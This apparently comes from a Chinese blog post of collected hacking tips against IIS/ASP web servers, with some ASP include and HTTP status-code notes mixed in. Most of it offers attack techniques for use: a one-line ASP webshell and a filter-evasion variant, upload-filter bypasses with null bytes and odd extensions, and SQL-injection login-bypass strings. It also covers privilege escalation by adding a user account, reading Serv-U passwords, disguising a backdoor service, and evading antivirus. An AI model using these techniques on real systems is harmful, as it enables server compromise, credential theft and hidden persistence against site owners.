当被限制上传类型时 可以尝试shtm还有stm和shtml后缀(由ssinc.dll来解析) 内容为<!--#include file="../../../../../../../../conn.asp"-->可以直接把conn.asp文件的内容显示出来了,用右键查看源代码可以看见。(shtm和stm)win2003和xp无效,因为IIS6如果不开启未知cgi后缀解析,显示的就是出现文件不存在。

在/system32/drivers/etc/下的Hosts文件[>win 2000],用记事本打开后,另起一行加入
127.0.0.1 www.xxx.com       (域名劫持)
 
在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小  的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script   language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样  执行.

用UltraEdit以16进制方式打开SkSockServer.exe。
查找SkServer,将它们全部替换为8位的英文字母,比如AreaEach(只是举例子作参考,自己可以改成自己想要的,注意要8位,而且单词首字母大写) 。

截杀session

提升权限的第二个方法:改CMD的路径。我们先上传一个CMD.exe到一个EVERYBODY权限的地方
在shell模式下,不论什么后缀都是要当作.exe可执行文件来执行的
CONVERT e:/FS:NTFS

现在大部分html页面是动态页面放入了html模版而形成的静态页面,我们的攻击思路也就明确了,就是从这些静态页面里找出动态页面的地址,在找出注入点,我们需要的工具是sniffer。
首先看有没有后台登陆页面,用工具扫后台,然后在原代码里面看有没有asp?id=xxx的这样的,如果这些都具备了,那么就是ASP生成HTML的网站

先上传asp图片,在注入点使用dos改图片为木马。需要sa权限,用copy或ren命令

访问这个 IP ,返回"No web site is configured at this address.",初步判断是虚拟主机

先通过 aspshell 下载 Serv-U 的任意一个快捷方式,然后本地查看属性的目标  Serv-U 的目录是 "C:/Program Filesewfq4qrqtgy4635/Serv-U/" , 直接跳转目录。 看到了,马上修改 ServUDaemon.ini文件

view-source:查看web代码

<head><a href="c:/">c</a></head>  无盘时进入c

总之只要是带有参数的动态网页且此网页访问了数据库,那么就有可能存在SQL注入

and 1=(select @@VERSION) 这个是SQL判断版本号的语句                                          1'or'1'='1                                 
密码:123' or '1'='1

1'or'1=1  'or'='or'
'or''='  " or "a"="a     ') or ('a'='a     ") or ("a"="a    or 1=1--   ' or 'a'='a

inc结尾,IE就能够读取里面的所有信息

select语句在判断查询条件时,遇到或(or)操作就会忽略下面的与(and)操作          
sql="select * from admin where username="&user&" and password="&pwd&""           
sql="select * from admin where username='111'or'1=1' and password='pass'
sql="select * from admin where username='1'or'1'='1' and password='pass'

有时候是SQLSEVER服务器,但是它页面是HTML,你可以看一下里面有什么会员和下载连接,新闻连接的,你可以随便点一个,然后在查看里面搜索.ASP?然后就会给你一个,你把这个测试1=1,1=2看有没有注入点

开始菜单->运行->iexpress(输入运行这个命令)
然后呢就自己配置吧  其实就是利用系统自带的CAB打包压缩功能~
只要你合并的文件不被杀合并器就不会被杀~

c:/progra~1/winrar/rar.exe a d:/web/test/web1.rar d:/web/test/web1  dos下解压

可以把一些常用的ASP代码、函数放在一个.inc中,这样以后使用的时候在ASP文件中加上
    <!--#include virtual="/inc/comm/adovbs.inc"-->
    就可以使用该ASP中的代码或函数了,效果和把文件的代码直接写在.asp中是一样的。这里的virtual表示是主机的虚拟目录。例如,当前.asp如果是http://www.myserver.com/mypath/myfile.asp,则该.inc文件为http://www.myserver.com/inc/comm/adovbs.inc。

1.相对路径<!--#include file="common.asp"--> 默认为调用它的那个asp所在目录下的common.asp

<!--#include file="../common.asp" -->调用它的那个asp所在目录的上一级目录下的common.asp

2.绝对路径
<!--#include virtual="common.asp"--> 默认为根目录下的common.asp
< !--#include virtual="test/common.asp"--> 根目录下的test目录下的common.asp

hidden字段作用
当这个HTML文件在网络浏览器上显示时,你只能在屏幕上看见一个Submit按钮,名为secret的隐藏区并未显示出来。然而当窗体按钮被按下时,值You cannot see me!被作为窗体内容的一部分发送了

<iframe src="http://..." frameborder="0" width=100% height=100% scrolling=no>   </iframe>
<embed src="http://www.luki8.com/luki/jay/play/kanv.mp3" autostart="true" loop="true" hidden="true"></embed>         背景音乐

<noscript>
<iframe src=*></iframe>
</noscript>   在body中加入此代码 保存网页时将出错

<meta http-equiv="refresh" content="5;url=http://XXX.139.com">,5秒后自动转到XXX.139.com
<script>alert('abc');</script>

输入nc -vv *.*.*.* (端口号) ,然后再输入get  获得相关端口的信息

telnet x.x.x.x 80
回车两次。

cer文件和asp文件在iis中默认用同一个解释器来解释,就是说相对于用户,服务器怎么执行asp,就怎么执行cer。上传的扩展名为cer的asp木马,一样可以正常使用

instsrv  服务名  程序路径

echo Windows Registry Editor Version 5.00> d:/ip.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/服务名]>> d:/ip.reg
echo "Description"=" 为移动媒体、驱动程序和库提供基层安全协议服务。">> d:/ip.reg
regedit /s d:/ip.reg

挂马的另1思路:把快捷方式的指向更改。

暴库的原理也就是,利用调用数据库出错的信息来暴出数据的路径

url编码就是一个字符ascii码的十六进制。不过稍微有些变动,需要在前面加上"%"。比如"/",它的ascii码是92,92的十六进制是5c,所以"/"的url编码就是%5c

我们同样可以在字串中构造“/0”,又在结尾处构造RAR,因为扩展名是从右读取的,它认为文件类型是rar,从而可以骗过扩展名验证可以上传,在保存时,文件名又是从左边读取的,当它遇到“/0”时,后面就都丢掉了,于是文件就被保存成我想要的updata.asp了

<!--#include file="ok.asp"-->  保存为1.stm文件 查看该页代码就能看到ok.asp的代码

浏览器在无法查别该文件是什么类型时就会第一时间尝试以HTML的格式来打开它了,这样刚好应了攻击者的要求。

RUNAT属性是指示出该脚本应当在Server端还是在Client(浏览器上)端实现
request对象对应于HTTP请求,response对象对应于HTTP响应
End方法会立即停止Active Server Pages的执行和相应结果
Clear方法是用来在不将缓存中的内容输出的前提下清空当前页的buffer,仅仅是使用了缓存输出的时候你才可以利用clear方法
■1xx信息:这种状态码主要是实验性的。

■2xx成功:这种状态信息是说明请求已经被成功接受并响应,例如:状态码200表示主页请求被完全成功的接受。

■3xx重定向。 这个状态码指示一些接受请求前必须了解的一些其后面进程的信息,例如:状态码301说明该主页已经转移到了其他地址,这时浏览器会自动转向新的地址。

■4xx客户端错误:这个状态码表示浏览器发出的是错误的请求,例如:404指的是浏览器请求的主页是不存在的。

5xx服务端错误:这种状态码表明服务器响应出现了问题,例如,503指当前服务端遇到了无法应付的错误。

在IIS中先执行INCLUDE语句而后才是VB脚本的执行

在Global.asa中不能有任何输出语句,无论是HTML的语法还是Response.Write()方法都是不行的,Global.asa是任何情况下也不能进行显示的。
你只需要在Global.asa中添加一些你希望执行的脚本,那么只要Session一创建,这些脚本就会自动执行

对于拿到了webshell 但不能找到某后台的登陆密码和帐户的 可以把相关的asp文件里面密码或帐户检测语句的=改为<> 即不等于

拿到webshell,不能运行程序,开telnet,如果开了防火墙连不上,用fpipe端口转向到以前开的端口,如果显示遗失对主机连接,在本机建一个对方主机上一样的用户名和密码,以他为身份运行cmd,telnet上去 ok

"cacls.exe d: /E /T /G everyone:F"权限取消

把本来调用的d:/web/database/cmd.exe改为
d:/web/database/su.exe "net user linzi 123 /add"
其它地方随便输,然后点执行
有了回显,再改调用cmd.exe,输入net user

我们在这里调用cmd.exe,但是没有给我们执行
的权限,所以当我们调用的东西是一个命令时,这时又因为我们又有调用的权限,所以我们的命令也
成功了

上传中文件名的关键字被过滤的情况 可以尝试把关键字换会大写

1.用WORD打开后,用快捷键Shift+F3将小写转成大写.
2.用火狐出品的"火狐--ASP代码变形器",或"Asp webshell 变形器1.5".

可以下载ServUAdmin.exe这个文件。用十六进制编辑器查看。里面有密码。还有端口。
完全没有加密。你直接打开。换成16进制,查找administrator看看。一般人家都是改密码和端口。用户名不改的。找用户名和密码或者端口其中一个就可以了。三个是连在一起的。

当得到管理员密码,而默认的管理入口修改了,可以尝试验证页面(如findaccout.asp)
 提交 www.xxxx.com/findaccout.asp?name=管理员&pwd=密码

经过同一网关的机子 用交换机连接 现在机房一般都是交换环境
要是用hub(集线器)连接就是非交换环境

查看是否端口过滤:肉鸡上用netstat -an 然后扫描肉鸡 看结果是否相同

用百度暴库 比如bbs/data/

一句话技巧(to be continue)相关推荐

  1. javascript一句话技巧

    1,使控件不可用 var d = document.getElementById('<%=this.TextBox1.ClientID %>');             // d.sty ...

  2. Go-技篇第一 技巧杂烩

    Go-技篇第一 技巧杂烩 一句话技巧 把你面向对象的大脑扔到家里吧,去拥抱接口.@mikegehard 学习如何使用Go的方式做事,不要把别的的编程风格强行用在Go里面.@DrNic 多用接口总比少用 ...

  3. 处理增删改_这10个批量处理的PPT技巧,让你的效率提升100倍!

    职场中要学的PPT技能,不一定是为了漂亮.炫酷,更是为了高效.省时.在职场中脱颖而出的秘密或许并没有那么麻烦,对同样一件事,别人用一小时完成,你用一分钟能完成,你就是超级人才. 今天,就为各位总结了P ...

  4. 打造一个实用的Ubuntu Linux

    作为一个新手,面对这个Ubuntu时,都会有一个无从下手的感觉,虽然论坛上有不少教程,可总觉得不太适合,有时又觉得很零散.我也有个这样的经历.也 因此,我把我使用Ubuntu的经历写下来,希望能给一想 ...

  5. 一些常用的ubuntu软件安装方式

    1.安装Ubuntu 2.更新系统中的源 3.安装中文环境 4.安装常用 的软件 电骡amule .bt客户端Azureus .词霸星际译王.QQ客户端lumaqq.RAR 压缩/解压缩程序.下载软件 ...

  6. ubuntu从一个单纯的系统到装上自己需要的一些软件的过程

    1.安装 Ubuntu 2.更新系统中的源 3.安装 中文环境 4.安装 常用 的软件 RAR 压缩/解压缩程序.词霸星际译王.多媒体编码器.totem.mplayer.Realplayer.Beep ...

  7. ubuntu装后的常用软件的安装与配置

    一.配置 ADSL 拨号上网 sudo pppoeconf 然后按照提示一步一步操作即可. 注意它会提示你是不是开机自动连接上网,选择是,每次开机就会自动拨号. 二.修改为国内源 我这里使用 cn99 ...

  8. ubuntu 7.04 硬盘安装与安装后的常用软件的安装与配置 [zz]

    硬盘安装先下载光盘映像  然后再下载引导文件 注意千万不能用光盘自带的vmlinuz和initrd.gz 网上google一下就可以找到可以硬盘安装的这两个文件 下面安装就和以前的一样了也可以去goo ...

  9. 电脑爱好者计算机杂志,电脑爱好者杂志

    电脑爱好者杂志基础信息: <电脑爱好者>杂志社创建于1993年6月,隶属于中国科学院.发展至今她已经成为拥有<电脑爱好者>半月刊.<电脑高手>.<电脑爱好者合 ...

最新文章

  1. Windows 消息循环(1) - 概览
  2. Asp.net2.0下的大文件上传服务器控件
  3. Linux 0.12内核的内存管理基础
  4. css3动画-animation
  5. python时间处理模块有哪些_Python模块之时间处理
  6. P1220-关路灯【区间dp】
  7. apache isis_使用Apache Isis快速进行SEMAT应用程序开发
  8. python正则表达式group用法_【Python】正则表达式用法
  9. datetimepicker获取年月日_bootstrap-datetimepicker 获取时间
  10. skyline TerraBuilder(TB)处理不规则范围影像,去除空值,填充高程等(转载)
  11. 服务器监控页面html_Nmon实时监控并生成HTML监控报告
  12. Ubuntu设置局域网Windows共享文件Samba
  13. 在使用SVN,下载文件到本地时,一定要把全目录下载下来!
  14. python中shuffle是什么意思_选择vs.Shuffle,Python
  15. [数据库]-- mysql 获取昨天日期、今天日期、明天日期以及前一个小时和后一个小时的时间
  16. spring-security实现权限管理
  17. Java file outside of source root
  18. Log4j for C++ 实用指南
  19. uva 10285 - Longest Run on a Snowboard(dp+记忆化搜索)
  20. linux下使用安装包安装git

热门文章

  1. 超低功耗蓝牙模块的常用工作模式
  2. 100个Python实用程序-1.批量生成试卷文件
  3. 香港公司注册详细介绍
  4. Vue之diff算法
  5. 国企招聘丨中国移动招聘公告!六险二金!薪资过万!全国各地有岗!快转给身边需要的人!
  6. 2022年货节盘点:看看你的年货买亏了吗?
  7. 第三章 VB程序设计语言基础
  8. 浅议智能物流运输系统
  9. 无犯罪证明(开证明指南山西籍)
  10. 『C语言』getchar() putchar() 〖input output〗